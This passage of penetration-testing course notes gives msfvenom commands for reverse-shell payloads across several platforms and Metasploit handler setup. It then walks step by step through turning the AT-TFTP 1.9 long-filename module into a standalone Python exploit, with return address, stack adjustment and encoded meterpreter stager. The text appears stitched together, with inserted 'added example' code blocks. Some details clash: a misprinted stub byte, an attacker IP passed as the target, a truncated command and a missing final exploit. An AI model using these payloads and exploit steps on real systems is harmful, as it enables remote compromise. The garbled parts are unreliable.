  1753.  
  1754. -You will occasionally need to add a few NOPs at the start of your payload. -n <length> places a nopsled of [length]
  1755. bytes at the beginning of your payload.
  1756.  
  1757. msfvenom --smallest
  1758.  
  1759. -If the --smallest switch is used, msfvenom will attempt to create the smallest shellcode possible using the
  1760. selected encoder and payload.
  1761.  
  1762. msfvenom -c, --add-code
  1763.  
  1764. -Specify an additional win32 shellcode file to include, essentially creating two (2) or more payloads in one (1)
  1765. shellcode.
  1766.  
  1767. -(The original notes showed three screenshots here: generating payload #1, then adding payload #2 and payload #3 with -c.)
  1768.  
  1769. -Running the resulting "cookies.exe" file will execute both message box payloads, as well as the bindshell using default
  1770. settings (port 4444).
  1771.  
  1772. msfvenom -x, --template & -k, --keep
  1773.  
  1774. -The -x, or --template, option is used to specify an existing executable to use as a template when creating your
  1775. executable payload.
  1776. -Using the -k, or --keep option in conjunction will preserve the template's normal behavior and have your injected
  1777. payload run as a separate thread.
  1782.  
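To make the -b, -n, -v and -f flags above less of a black box, here is an added Ruby example (not msfvenom's own code) that does the three post-processing steps by hand on a constructed 14-byte placeholder, which is not a real payload: it reports the offsets of the bad characters that -b would have to drive out of the encoded output, prepends a plain 0x90 sled like -n (msfvenom draws its sled from a NOP generator rather than plain 0x90s), and prints the bytes in the -f python and -f c layouts with a custom -v variable name. The variable name "buf" and 16 bytes per line mirror msfvenom's defaults.

```ruby
# Added example, not part of the original notes or of msfvenom itself:
# what -b, -n, -v and -f python / -f c do after the payload bytes exist.

# Constructed placeholder (INT3s plus a few bytes), NOT a working payload.
SAMPLE_SHELLCODE = "\xFC\xE8\x00\x00\x00\x00\x60\x89\xE5\x31\xC0\x0A\x0D\xCC".b

# Bad characters the way -b takes them: a string such as '\x00\x0a\x0d'.
def parse_badchars(spec)
  spec.scan(/\\x(\h{2})/).flatten.map { |h| h.to_i(16).chr }.join.b
end

# Offsets of every bad byte; an empty array means the buffer is clean.
# With -b, msfvenom picks an encoder and re-encodes until this is empty (or gives up).
def badchar_offsets(buf, badchars)
  buf.each_byte.with_index.select { |b, _| badchars.include?(b.chr) }.map(&:last)
end

# -n <len>: prepend a NOP sled (plain 0x90 here).
def nopsled(buf, length)
  ("\x90".b * length) + buf
end

# -f python -v <name>: the "buf =  b\"\"" / "buf += b\"\\x..\"" form, 16 bytes per line.
def format_python(buf, var: 'buf', width: 16)
  lines = ["#{var} =  b\"\""]
  buf.bytes.each_slice(width) do |chunk|
    lines << "#{var} += b\"#{chunk.map { |b| format('\\x%02x', b) }.join}\""
  end
  lines.join("\n")
end

# -f c -v <name>: one C array initialised from adjacent string literals.
def format_c(buf, var: 'buf', width: 16)
  body = buf.bytes.each_slice(width).map do |chunk|
    '"' + chunk.map { |b| format('\\x%02x', b) }.join + '"'
  end
  "unsigned char #{var}[] =\n#{body.join("\n")};"
end

if __FILE__ == $PROGRAM_NAME
  bad = parse_badchars('\x00\x0a\x0d')
  puts "bad bytes at offsets: #{badchar_offsets(SAMPLE_SHELLCODE, bad).inspect}"
  puts format_python(nopsled(SAMPLE_SHELLCODE, 4), var: 'shellcode')
  puts format_c(SAMPLE_SHELLCODE)
end
```

The bad-character check is the part worth keeping around: run it over whatever msfvenom (or your own encoder) emits before you paste the bytes into an exploit, because a stray 0x00 or 0x0a in a string-handling bug truncates the payload silently.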
  1783. - Creating Metasploit Payloads
  1784.  
  1785. -Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfvenom payload generator
  1786. (formerly msfpayload). Multiple payloads can be created with it, and it can give you a shell in almost any
  1787. situation. For each of these payloads, you can go into msfconsole and select exploit/multi/handler. Run 'set
  1788. payload' for the relevant payload used and configure all necessary options (LHOST, LPORT, etc). Execute and wait for
  1789. the payload to be run. For the examples below it's pretty self explanatory but LHOST should be filled in with your
  1790. IP address (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be
  1791. the port you wish to be connected back on. The handler's PAYLOAD, LHOST and LPORT must match what you passed to msfvenom.
  1792.  
  1793. - List payloads
  1794.  
  1795. msfvenom -l
  1796.  
  1797. - Binaries
  1798.  
  1799. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.153.164 LPORT=4444 -f elf > shell.elf
  1800.  
  1801. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.153.164 LPORT=4444 -f exe > shell.exe
  1802.  
  1803. - Mac
  1804. msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.153.164 LPORT=7777 -f macho > shell.macho
  1805.  
  1806. - PHP
  1807.  
  1808. msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.153.164 LPORT=7777 -f raw  > shell.php
  1809.  
  1810.  
  1811. Scripting Payloads
  1812. - Python
  1813. msfvenom -p cmd/unix/reverse_python LHOST=192.168.153.164 LPORT=4444 -f raw > shell.py
  1814.  
  1815.  
  1816. - Bash
  1817. msfvenom -p cmd/unix/reverse_bash LHOST=192.168.153.164 LPORT=4444 -f raw > shell.sh
  1818.  
  1819.  
  1820. - Perl
  1821. msfvenom -p cmd/unix/reverse_perl LHOST=192.168.153.164 LPORT=4444 -f raw > shell.pl
  1822.  
  1823. -Shellcode
  1824.  
  1825. -For all shellcode options see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output
  1826. code that is able to be cut and pasted in this language for your exploits.
  1827.  
  1828. - Linux Based Shellcode
  1829. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.153.164 LPORT=7777 -f python
  1830.  
  1831. - Windows Based Shellcode
  1832. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.164 LPORT=7777 -f python
  1833.  
  1834. - Mac Based Shellcode
  1835. msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.153.164 LPORT=4444 -f python
  1836.  
  1837. -Handlers
  1838. -Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming
  1839. shells. Handlers should be in the following format.
  1840.  
  1841. use exploit/multi/handler
  1842. set PAYLOAD windows/meterpreter/reverse_tcp
  1843. set LHOST 192.168.153.164
  1844. set LPORT 4444
  1845. set ExitOnSession false
  1846. exploit -j
  1847.  
  1848. -Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
  1849.  
  1850.  
  1851.  
  1852.  
  1853.  
  1854. #######################################################################
  1855. # Chapter 13: Converting Metasploit Exploits to a Stand Alone Exploit #
  1856. #######################################################################
  1857.  
  1858.  
  1859.  
  1860. Sometimes you might want to have a stand alone exploit, but the only option out there is a Metasploit module. Sure
  1861. you could always just fire up Metasploit and use it… but what fun would that be? Besides it’s great to understand
  1862. what’s going on under the hood of the Metasploit modules for both getting a handle on writing your own exploits and
  1863. in the future even writing your own Metasploit modules and contributing back to the fantastic project.
  1864. Requirements
  1865.  
  1866. ●     Windows XP – SP3 Virtual Machine (Victim).
  1867. ●     StrategicSec Virtual Machine (Attacker).
  1868. ●     Allied Telesyn TFTP Server 1.9 (Available here:   http://netsec.ws/wp-content/downloads/at-tftpd19.exe).
  1869. ●     A willingness to give things a go.
  1870.  
  1871.  
  1872. -The Target
  1873.  
  1874. -We’re going to be adapting the attftp_long_filename.rb module located at
  1875. -/home/strategicsec/toolz/metasploit/modules/exploits/windows/tftp/attftp_long_filename.rb and changing it into our
  1876. own stand alone Python exploit. I’m by no means an experienced exploit writer so this is something that I’ve hacked
  1877. together and figured out myself, there may be more optimal ways of doing each step. Full credit must be given to
  1878. ‘patrick’ the original author of the module along with prop’s to c0re since we’re pulling out his return address.
  1879. attftp_long_filename.rb
  1880.  
  1881.  
  1882. -Key Points
  1883.  
  1884. -Let’s run through some key points of the module and try and understand it a little better. Only parts that have an
  1885. impact on our exploit will be examined.
  1886.  
  1887.  
  1888. -Default Exit Options
  1889.  
  1890. -As noted above, the default exit function is ‘process’. This the method in which the shellcode will exit after
  1891. running and typically has an impact on how stable the vulnerable program will be after we send our exploit. This
  1892. value should be noted for when we alter the shellcode used to suit our particular situation.
  1893.  
  1894. -Payload
  1895.  
  1896.  
  1897. -The payload is one of the key aspects we need to examine. This states that we have 210 bytes of space for our
  1898. payload to reside in. Any larger and we may possibly run into issues of corruption or truncation of our exploit. Bad
  1899. characters signify bytes that may impact our exploit. We need to ensure none of these characters are in our
  1900. shellcode, and in this case it’s the almost universally bad null character ‘0x00′. For more information on bad
  1901. characters search this site for writing basic buffer overflows. Finally, we see something called stack adjustment.
  1902. Essentially because we’re so restricted in space we need to utilize something called a staged payload. What we’re
  1903. doing is only sending a small first instruction which is designed to connect back to us and get the main payload,
  1904. which wouldn’t regularly fit. Because of this we need to adjust the stack pointer back 3500 bytes so it has room to
  1905. actually write the payload without overwriting itself.
  1906.  
  1907. -Targets
  1908.  
  1909.  
  1910. -Metasploit has a wide variety of targets for many exploits, which really is mostly a wide variety of suitable return
  1911. addresses for each operating system. Because they are often using system DLLs, these addresses are not changed from
  1912. computer to computer and ensures exploit compatibility. In our case, we wish to use the return address donated by
  1913. c0re, Windows XP SP3.
  1914.  
  1915.  
  1916. -The Exploit
  1917.  
  1918.  
  1919. -The main part all the rest has been leading up to, the exploit itself. Let’s go through it line by line to ensure we
  1920. understand.
  1921.  
  1922. -connect_udp
  1923.  
  1924.  
  1925.  
  1926. -This signifies that the exploit will be sent over UDP packets. This line connects sets the target as the values in
  1927.  
  1928. -Metasploit such as RHOST and RPORT.
  1929.  
  1930. -sploit = "\x00\x02" +....
  1931.  
  1932. -The exploit is started with two hex values, ‘0x00′ and ‘0x02′ followed by a series of NOPs. The nops component is going to be variable in length depending on the length of your LAN IP, but always totaling 25 in total. As an example the LHOST value of ‘192.168.1.2’ has a length of 11, while an IP address of ‘192.168.100.123’ has a length of 15. If you want to play around with this fire up IRB (Interactive Ruby Shell) and assign a variable such as LHOST = ‘192.168.1.50’. The command LHOST.length will then tell you the length value – or just count how many characters
  1933. there are including periods.
  1934.  
  1935. -sploit << payload.encoded
  1936.  
  1937.  
  1938.  
  1939. -This line encodes the payload specified within Metasploit and encodes it in the required format. Metasploit will internally determine what payloads are suitable given the space available and the target operating system, and they can be viewed with the ‘show payloads’ command. When we say ‘required format’ it means that it will exclude the nominated bad characters earlier in the exploit.
  1940.  
  1941.  
  1942. -sploit << [target['RET']].pack('V')
  1943.  
  1944.  
  1945. -This command will append the target return address into the exploit string. It’s presented as a variable here because within Metasploit you can nominate different operating systems, but for our purposes it will just be the Windows XP SP3 return address. The pack ‘V’ command signifies that it needs to be packed in little endian format, necessary for x86 processors.
  1946.  
  1947. -sploit << "x88\xc4\x28\xc3"
  1948.  
  1949. -Translated into commands, this is instructing the esp register to add 40 bytes and return. Necessary to position esp correctly for our exploit.
  1950.  
  1951. -sploit<< "\x00" + "netascii" + ...
  1952.  
  1953. -The final string of our exploit, this terminates the data stream in a format AT-TFTP is expecting.
  1954. -udp_sock.put(sploit)
  1955.  
  1956.  
  1957. -This instructs Metasploit to send the exploit via UDP.
  1958.  
  1959. disconnect_udp
  1960.  
  1961.  
  1962. -Self-explanatory but this signifies it has finished with the UDP socket.
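The walkthrough above describes the on-the-wire layout of the malicious request: a TFTP write-request opcode, an overlong ‘filename’ made of NOPs, payload, return address and stub, then a NUL, the mode string and a final NUL. The following is an added example written from the defender’s side and is not part of the original course notes or the Metasploit module: it parses a TFTP request datagram according to that layout (RFC 1350 fields) and reports why a request looks like a long-filename overflow attempt. The sample datagrams are constructed here, the 128-byte filename threshold is an assumption chosen for the example, and the filler bytes (‘A’ and ‘B’) stand in for the payload and return address rather than reproducing them.

```python
import struct

# TFTP opcodes (RFC 1350); the exploit above uses 2, a write request (WRQ).
TFTP_OPCODES = {1: "RRQ", 2: "WRQ", 3: "DATA", 4: "ACK", 5: "ERROR"}
# Transfer modes defined by RFC 1350; anything else is malformed.
TFTP_MODES = {b"netascii", b"octet", b"mail"}
# Assumption for this example: legitimate TFTP filenames are short.
# AT-TFTP's overflow needs far more than this to reach the return address.
MAX_SANE_FILENAME = 128

def parse_tftp_request(datagram):
    """Split an RRQ/WRQ datagram into (opcode, filename, mode).

    For opcodes other than RRQ/WRQ, filename and mode are returned as None.
    Raises ValueError on a truncated or non-NUL-terminated request.
    """
    if len(datagram) < 2:
        raise ValueError("datagram too short for a TFTP opcode")
    (opcode,) = struct.unpack("!H", datagram[:2])   # opcode is big endian
    if opcode not in (1, 2):
        return opcode, None, None
    body = datagram[2:]
    fn_end = body.find(b"\x00")                      # filename is NUL-terminated
    if fn_end < 0:
        raise ValueError("filename not NUL-terminated")
    filename = body[:fn_end]
    rest = body[fn_end + 1:]
    mode_end = rest.find(b"\x00")                    # mode is NUL-terminated
    if mode_end < 0:
        raise ValueError("mode not NUL-terminated")
    return opcode, filename, rest[:mode_end]

def assess_tftp_request(datagram):
    """Return a list of findings that explain why a request looks hostile.

    An empty list means the request parsed cleanly and looks ordinary.
    """
    findings = []
    try:
        opcode, filename, mode = parse_tftp_request(datagram)
    except ValueError as exc:
        return ["malformed: %s" % exc]
    if filename is None:                             # not a read/write request
        return findings
    if len(filename) > MAX_SANE_FILENAME:
        findings.append("filename length %d exceeds %d"
                        % (len(filename), MAX_SANE_FILENAME))
    if any(b < 0x20 or b > 0x7e for b in filename):
        findings.append("filename contains non-printable bytes")
    if filename.startswith(b"\x90" * 8):             # run of x86 NOPs at the front
        findings.append("filename begins with a NOP sled")
    if mode.lower() not in TFTP_MODES:
        findings.append("unknown transfer mode %r" % mode)
    return findings

# Constructed sample: an ordinary write request for "boot.cfg" in octet mode.
BENIGN_WRQ = b"\x00\x02" + b"boot.cfg\x00" + b"octet\x00"
# Constructed sample following the layout described above: 14 NOPs (as for an
# 11-character LHOST), 200 bytes of filler where the payload would sit, and
# 8 bytes of filler where the return address and stub would sit.
SUSPICIOUS_WRQ = (b"\x00\x02" + b"\x90" * 14 + b"A" * 200 + b"B" * 8
                  + b"\x00netascii\x00")

if __name__ == "__main__":
    for name, dgram in (("benign", BENIGN_WRQ), ("suspicious", SUSPICIOUS_WRQ)):
        print(name, assess_tftp_request(dgram) or "no findings")
```

Run against a capture of port 69 traffic, the same function can be applied to each datagram; a request that trips the length check is worth an alert regardless of what the filler bytes contain, since no legitimate client sends a filename that long.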
-Adapting Each Part

-Let’s summarize what we need to achieve in our own exploit for it to get working, based on the areas highlighted
above.
●     Create an appropriately sized NOP sled based off the size of LHOST
●     Nominate the return address and pack it in little endian format
●     Generate shellcode suitable for our situation (LHOST, etc)
●     Perform stack adjustment on the shellcode so our second stage can write correctly
●     Send the exploit over UDP with Python

About the only step in there which should sound a little challenging is the stack adjustment business, but really, as
with all things, it’s a lot easier than it sounds.

-Let’s begin with a very bare bones UDP framework for sending information to the target.

#nano at-tftp.py
# AT-TFTP v1.9 Exploit
# Written for Strategic Security
# Python 2: str literals are byte strings, so they can be handed to sendto() directly
import sys, socket
# Use in the form "python attftp_long_filename.py <IP Address> <Port> <Your IP Address>"
host = sys.argv[1]                                          # Receive IP from user
port = int(sys.argv[2])                                     # Receive Port from user
exploit = ""                                                # Our future exploit location
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)   # Declare a UDP socket
client.sendto(exploit, (host, port))                        # Send the exploit over UDP to the nominated address


-Now from here a lot of the information is going to be straight translations from the Ruby counterparts. This includes
creating the appropriately sized NOPs and the return address, along with the information we know will be sent to set
up the exploit itself. Let’s incorporate that into our framework.

# AT-TFTP v1.9 Exploit
# Written for Strategic Security
# Python 2: str literals are byte strings, so they can be handed to sendto() directly
import sys, socket

# Use in the form "python attftp_long_filename.py <Target IP Address> <Port> <Your IP Address>"
host = sys.argv[1]                                          # Receive IP from user
lhost = sys.argv[3]                                         # Receive our own IP (sets the NOP sled length)
port = int(sys.argv[2])                                     # Receive Port from user
ret = "\x53\x93\x42\x7e"                                    # Return address - Source Metasploit (Little Endian)
nop = "\x90" * (25 - len(lhost))                            # NOPs + LHOST must add up to 25 bytes
payload = ""                                                # Payload to be calculated
exploit = "\x00\x02" + nop + payload + ret + "\x83\xc4\x28\xc3\x00netascii\x00"     # Our exploit so far
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)   # Declare a UDP socket
client.sendto(exploit, (host, port))                        # Send the exploit over UDP to the nominated address


-Now that we’ve got the known information, we need to take the next step and factor in the stack adjustment for our
staged payload.


-Stack Adjustment

-First we need to dump our payload into a raw binary file for further manipulation. Our payload, in this case, is going
to be the meterpreter stager windows/meterpreter/reverse_nonx_tcp, chosen for its particularly small code footprint.

-We use the command,

./msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=192.168.153.164 LPORT=4443 --platform windows -a x86 -o payload


-If we wish to confirm this has successfully been written to the file we can use the command

#hexdump -C payload


-This will also come in handy when comparing the file against the post stack adjustment version. Next we need to find
out what instruction we actually need to use to adjust the stack by -3500 bytes.
This can be done using the Metasploit tool nasm_shell.rb, located here

/usr/share/metasploit-framework/tools/nasm_shell.rb

-Putting in an assembly instruction will give you the hex machine code for that instruction. Since we want to subtract
3500 (0xDAC in hex) from the stack pointer we do the following.
Install nasm before proceeding to the next command.

#sudo apt-get install nasm
#ruby /home/strategicsec/toolz/metasploit/tools/nasm_shell.rb
nasm > sub esp, 0xDAC
00000000  81ECAC0D0000      sub esp,0xdac


-This tells us we need to use the bytes 81EC AC0D 0000 to adjust the stack by 3500. We output this into a raw binary
file. You can do it however you wish, such as with a hex editor, but a quick one line example with Perl is as follows,

#perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj

-We now have two raw files - stackadj and our payload. We want to combine them both together, which is a simple cat
command,

#cat stackadj payload > shellcode

-To confirm we now have the file in the correct format we once more examine it with hexdump and compare it against our
previous dump.

# hexdump -C shellcode


-It’s exactly the same as our past payload but with the stack adjustment at the start of the shellcode. We’re almost
done now, but we have one final step we need to do to the shellcode.

Encoding Shellcode

-In both our stack adjustment instruction and the payload itself, there are null characters which we need to remove.
The msfvenom encoder (the replacement for the old msfencode) comes to our rescue once again, and we can re-encode the
shellcode without nulls.
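The two steps just described, computing the ‘sub esp, imm32’ bytes and then discovering that they contain the 0x00 bad character, can be reproduced without nasm. The following is an added example, not code from the course notes or from Metasploit: it encodes the stack adjustment and the ‘add esp, 40; ret’ stub from the module with struct, and audits any buffer for the bad characters nominated in the module before it is handed to an encoder. The four-byte placeholder payload is constructed for the example; a real payload file would be read from disk instead.

```python
import struct

def encode_sub_esp(imm32):
    """Encode `sub esp, imm32` as x86 machine code.

    81 /5 id is `sub r/m32, imm32`; the ModRM byte 0xEC selects esp, and the
    32-bit immediate follows in little endian, which is why 0xDAC appears as
    AC 0D 00 00 in the nasm_shell output above.
    """
    if not 0 <= imm32 <= 0xFFFFFFFF:
        raise ValueError("immediate must fit in 32 bits")
    return b"\x81\xec" + struct.pack("<I", imm32)

def encode_add_esp_ret(imm8):
    """Encode `add esp, imm8 ; ret`, the 4-byte stub the module appends after RET.

    83 /0 ib is `add r/m32, imm8` with ModRM 0xC4 selecting esp; C3 is `ret`.
    """
    if not 0 <= imm8 <= 0x7F:
        raise ValueError("imm8 must be a non-negative sign-extended byte")
    return b"\x83\xc4" + struct.pack("<B", imm8) + b"\xc3"

def find_bad_chars(buf, bad=b"\x00"):
    """Return (offset, byte) pairs for every bad character present in buf.

    `bad` defaults to the single bad character the module nominates.
    """
    return [(i, b) for i, b in enumerate(buf) if b in bad]

def prepend_stack_adjust(payload, size=3500):
    """Mirror `cat stackadj payload > shellcode`: stack adjustment first, then payload."""
    return encode_sub_esp(size) + payload

if __name__ == "__main__":
    stackadj = encode_sub_esp(0xDAC)
    print("sub esp, 0xDAC ->", stackadj.hex())          # 81ecac0d0000
    print("add esp, 40; ret ->", encode_add_esp_ret(40).hex())
    # Constructed placeholder standing in for the raw msfvenom payload file.
    placeholder_payload = b"\xcc" * 4
    shellcode = prepend_stack_adjust(placeholder_payload)
    # The two zero bytes of the immediate are exactly why the encoding step is needed.
    print("bad chars before encoding:", find_bad_chars(shellcode))
```

The bad-character audit is the check to re-run on the encoder’s output as well: if ‘find_bad_chars’ on the encoded buffer is not empty, the encoder did not honour the ‘-b’ list and the exploit would be truncated at the first null just as described in the Payload section.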

strategicsec@ubuntu:~/toolz/metasploit$ cat shellcode | sudo ./msfvenom -b '\x00' -e x86/shikata_ga_nai -a x86 --platform win -f python


We can now cut and paste this shellcode into our Python exploit. The final exploit looks like the one below.

Final Stand Alone Exploit




Running the Exploit

- Let’s test this against our Windows XP victim. Install AT-TFTP v1.9 from the link in the requirements. Ensure you
unblock any firewall prompts to allow access. Because this is a staged payload, we need to set up Metasploit to catch
the incoming shell. It will then send the second, much larger stage (770048 bytes) that we could never have fit into
our exploit itself. Run the commands sequentially,

#msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_nonx_tcp
set LHOST 192.168.153.164
set LPORT 4443
exploit


- Now the fun stuff, we run the command,

# python at-tftp.py 192.168.153.164 69 192.168.153.163

- It goes without saying you should put in your own IP values, but the command should keep the format python
at-tftp.py <Target IP Address> <Port> <Your IP Address>. All going well, this is the result…


Congratulations, you’ve successfully modified your first Metasploit module into a standalone exploit.